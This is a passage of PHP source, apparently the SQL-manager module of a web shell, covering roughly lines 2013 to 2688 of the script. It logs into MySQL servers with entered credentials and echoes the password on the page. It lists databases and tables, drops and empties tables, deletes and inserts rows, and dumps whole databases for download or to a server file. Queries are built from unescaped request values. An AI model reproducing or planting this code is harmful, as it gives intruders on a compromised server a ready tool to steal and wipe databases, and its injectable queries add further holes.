2013 if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
2014
2015 if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
2016
2017 $sql_surl .= "&";
2018
2019 ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
2020 <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#15354c borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
2021
2022 if ($sql_server)
2023
2024 {
2025
2026 $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
2027
2028 $err = mysql_smarterror();
2029
2030 @mysql_select_db($sql_db,$sql_sock);
2031
2032 if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
2033
2034 }
2035
2036 else {$sql_sock = FALSE;}
2037
2038 echo "<b>SQL Manager:</b><br>";
2039
2040 if (!$sql_sock)
2041
2042 {
2043
2044 if (!$sql_server) {echo "NO CONNECTION";}
2045
2046 else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
2047
2048 }
2049
2050 else
2051
2052 {
2053
2054 $sqlquicklaunch = array();
2055
2056 $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
2057
2058 $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
2059
2060 $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
2061
2062 $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
2063
2064 $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
2065
2066 $sqlquicklaunch[] = array("Logout",$surl."act=sql");
2067
2068 echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
2069
2070 if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
2071
2072 echo "</center>";
2073
2074 }
2075
2076 echo "</td></tr><tr>";
2077
2078 if (!$sql_sock) {?>
2079 <td width="28%" height="100" valign="top"><center><font size="5"> i </font></center>
2080 <li>If login is null, login is owner of process.<li>
2081 If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table>
2082 </td>
2083 <?php }
2084
2085 else
2086{
2087
2088 //Start left panel
2089
2090 if (!empty($sql_db))
2091 {
2092
2093 ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
2094
2095 $result = mysql_list_tables($sql_db);
2096
2097 if (!$result) {echo mysql_smarterror();}
2098
2099 else
2100
2101 {
2102
2103 echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
2104
2105 $c = 0;
2106
2107 while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
2108
2109 if (!$c) {echo "No tables found in database.";}
2110
2111 }
2112
2113 }
2114
2115 else
2116
2117 {
2118
2119 ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
2120
2121 $result = mysql_list_dbs($sql_sock);
2122
2123 if (!$result) {echo mysql_smarterror();}
2124
2125 else
2126
2127 {
2128
2129 ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
2130
2131 $c = 0;
2132
2133 $dbs = "";
2134
2135 while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
2136
2137 echo "<option value=\"\">Databases (".$c.")</option>";
2138
2139 echo $dbs;
2140
2141 }
2142
2143 ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
2144
2145 }
2146
2147 //End left panel
2148
2149 echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
2150
2151 //Start center panel
2152
2153 $diplay = TRUE;
2154
2155 if ($sql_db)
2156
2157 {
2158
2159 if (!is_numeric($c)) {$c = 0;}
2160
2161 if ($c == 0) {$c = "no";}
2162
2163 echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
2164
2165 if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
2166
2167 echo "</b></center>";
2168
2169 $acts = array("","dump");
2170
2171 if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2172
2173 elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
2174
2175 elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
2176
2177 elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2178
2179 elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2180
2181 elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2182
2183 elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
2184
2185 elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
2186
2187 elseif ($sql_tbl_act == "insert")
2188
2189 {
2190
2191 if ($sql_tbl_insert_radio == 1)
2192
2193 {
2194
2195 $keys = "";
2196
2197 $akeys = array_keys($sql_tbl_insert);
2198
2199 foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
2200
2201 if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
2202
2203 $values = "";
2204
2205 $i = 0;
2206
2207 foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
2208
2209 if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
2210
2211 $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
2212
2213 $sql_act = "query";
2214
2215 $sql_tbl_act = "browse";
2216
2217 }
2218
2219 elseif ($sql_tbl_insert_radio == 2)
2220
2221 {
2222
2223 $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
2224
2225 $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
2226
2227 $result = mysql_query($sql_query) or print(mysql_smarterror());
2228
2229 $result = mysql_fetch_array($result, MYSQL_ASSOC);
2230
2231 $sql_act = "query";
2232
2233 $sql_tbl_act = "browse";
2234
2235 }
2236
2237 }
2238
2239 if ($sql_act == "query")
2240
2241 {
2242
2243 echo "<hr size=\"1\" noshade>";
2244
2245 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
2246
2247 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
2248
2249 if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
2250
2251 }
2252
2253 if (in_array($sql_act,$acts))
2254
2255 {
2256
2257 ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
2258
2259 if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
2260
2261 if ($sql_act == "newtbl")
2262
2263 {
2264
2265 echo "<b>";
2266
2267 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
2268
2269 }
2270
2271 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
2272
2273 }
2274
2275 elseif ($sql_act == "dump")
2276
2277 {
2278
2279 if (empty($submit))
2280
2281 {
2282
2283 $diplay = FALSE;
2284
2285 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
2286
2287 echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
2288
2289 $v = join (";",$dmptbls);
2290
2291 echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
2292
2293 if ($dump_file) {$tmp = $dump_file;}
2294
2295 else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
2296
2297 echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
2298
2299 echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
2300
2301 echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
2302
2303 echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
2304
2305 echo "</form>";
2306
2307 }
2308
2309 else
2310
2311 {
2312
2313 $diplay = TRUE;
2314
2315 $set = array();
2316
2317 $set["sock"] = $sql_sock;
2318
2319 $set["db"] = $sql_db;
2320
2321 $dump_out = "download";
2322
2323 $set["print"] = 0;
2324
2325 $set["nl2br"] = 0;
2326
2327 $set[""] = 0;
2328
2329 $set["file"] = $dump_file;
2330
2331 $set["add_drop"] = TRUE;
2332
2333 $set["onlytabs"] = array();
2334
2335 if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
2336
2337 $ret = mysql_dump($set);
2338
2339 if ($sql_dump_download)
2340
2341 {
2342
2343 @ob_clean();
2344
2345 header("Content-type: application/octet-stream");
2346
2347 header("Content-length: ".strlen($ret));
2348
2349 header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
2350
2351 echo $ret;
2352
2353 exit;
2354
2355 }
2356
2357 elseif ($sql_dump_savetofile)
2358
2359 {
2360
2361 $fp = fopen($sql_dump_file,"w");
2362
2363 if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
2364
2365 else
2366
2367 {
2368
2369 fwrite($fp,$ret);
2370
2371 fclose($fp);
2372
2373 echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
2374
2375 }
2376
2377 }
2378
2379 else {echo "<b>Dump: nothing to do!</b>";}
2380
2381 }
2382
2383 }
2384
2385 if ($diplay)
2386
2387 {
2388
2389 if (!empty($sql_tbl))
2390
2391 {
2392
2393 if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
2394
2395 $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
2396
2397 $count_row = mysql_fetch_array($count);
2398
2399 mysql_free_result($count);
2400
2401 $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
2402
2403 $tbl_struct_fields = array();
2404
2405 while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
2406
2407 if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
2408
2409 if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
2410
2411 if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
2412
2413 if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
2414
2415 $perpage = $sql_tbl_le - $sql_tbl_ls;
2416
2417 if (!is_numeric($perpage)) {$perpage = 10;}
2418
2419 $numpages = $count_row[0]/$perpage;
2420
2421 $e = explode(" ",$sql_order);
2422
2423 if (count($e) == 2)
2424
2425 {
2426
2427 if ($e[0] == "d") {$asc_desc = "DESC";}
2428
2429 else {$asc_desc = "ASC";}
2430
2431 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
2432
2433 }
2434
2435 else {$v = "";}
2436
2437 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
2438
2439 $result = mysql_query($query) or print(mysql_smarterror());
2440
2441 echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
2442
2443 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2444
2445 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2446
2447 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2448
2449 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
2450
2451 if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
2452
2453 if ($sql_tbl_act == "insert")
2454
2455 {
2456
2457 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
2458
2459 if (!empty($sql_tbl_insert_radio))
2460
2461 {
2462
2463
2464
2465 }
2466
2467 else
2468
2469 {
2470
2471 echo "<br><br><b>Inserting row into table:</b><br>";
2472
2473 if (!empty($sql_tbl_insert_q))
2474
2475 {
2476
2477 $sql_query = "SELECT * FROM `".$sql_tbl."`";
2478
2479 $sql_query .= " WHERE".$sql_tbl_insert_q;
2480
2481 $sql_query .= " LIMIT 1;";
2482
2483 $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
2484
2485 $values = mysql_fetch_assoc($result);
2486
2487 mysql_free_result($result);
2488
2489 }
2490
2491 else {$values = array();}
2492
2493 echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
2494
2495 foreach ($tbl_struct_fields as $field)
2496
2497 {
2498
2499 $name = $field["Field"];
2500
2501 if (empty($sql_tbl_insert_q)) {$v = "";}
2502
2503 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
2504
2505 $i++;
2506
2507 }
2508
2509 echo "</table><br>";
2510
2511 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
2512
2513 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
2514
2515 echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
2516
2517 }
2518
2519 }
2520
2521 if ($sql_tbl_act == "browse")
2522
2523 {
2524
2525 $sql_tbl_ls = abs($sql_tbl_ls);
2526
2527 $sql_tbl_le = abs($sql_tbl_le);
2528
2529 echo "<hr size=\"1\" noshade>";
2530
2531 echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
2532
2533 $b = 0;
2534
2535 for($i=0;$i<$numpages;$i++)
2536
2537 {
2538
2539 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
2540
2541 echo $i;
2542
2543 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
2544
2545 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
2546
2547 else {echo "&nbsp;";}
2548
2549 }
2550
2551 if ($i == 0) {echo "empty";}
2552
2553 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
2554
2555 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1>";
2556
2557 echo "<tr>";
2558
2559 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
2560
2561 for ($i=0;$i<mysql_num_fields($result);$i++)
2562
2563 {
2564
2565 $v = mysql_field_name($result,$i);
2566
2567 if ($e[0] == "a") {$s = "d"; $m = "asc";}
2568
2569 else {$s = "a"; $m = "desc";}
2570
2571 echo "<td>";
2572
2573 if (empty($e[0])) {$e[0] = "a";}
2574
2575 if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
2576
2577 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
2578
2579 echo "</td>";
2580
2581 }
2582
2583 echo "<td><font color=\"green\"><b>Action</b></font></td>";
2584
2585 echo "</tr>";
2586
2587 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
2588
2589 {
2590
2591 echo "<tr>";
2592
2593 $w = "";
2594
2595 $i = 0;
2596
2597 foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
2598
2599 if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
2600
2601 echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
2602
2603 $i = 0;
2604
2605 foreach ($row as $k=>$v)
2606
2607 {
2608
2609 $v = htmlspecialchars($v);
2610
2611 if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
2612
2613 echo "<td>".$v."</td>";
2614
2615 $i++;
2616
2617 }
2618
2619 echo "<td>";
2620
2621 echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
2622
2623 echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
2624
2625 echo "</td>";
2626
2627 echo "</tr>";
2628
2629 }
2630
2631 mysql_free_result($result);
2632
2633 echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
2634
2635 echo "<option value=\"\">With selected:</option>";
2636
2637 echo "<option value=\"deleterow\">Delete</option>";
2638
2639 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
2640
2641 }
2642
2643 }
2644
2645 else
2646
2647 {
2648
2649 $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
2650
2651 if (!$result) {echo mysql_smarterror();}
2652
2653 else
2654
2655 {
2656
2657 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#15354c borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
2658
2659
2660
2661 $i = 0;
2662
2663 $tsize = $trows = 0;
2664
2665 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
2666
2667 {
2668
2669 $tsize += $row["Data_length"];
2670
2671 $trows += $row["Rows"];
2672
2673 $size = view_size($row["Data_length"]);
2674
2675 echo "<tr>";
2676
2677 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
2678
2679 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
2680
2681 echo "<td>".$row["Rows"]."</td>";
2682
2683 echo "<td>".$row["Type"]."</td>";
2684
2685 echo "<td>".$row["Create_time"]."</td>";
2686
2687 echo "<td>".$row["Update_time"]."</td>";
2688
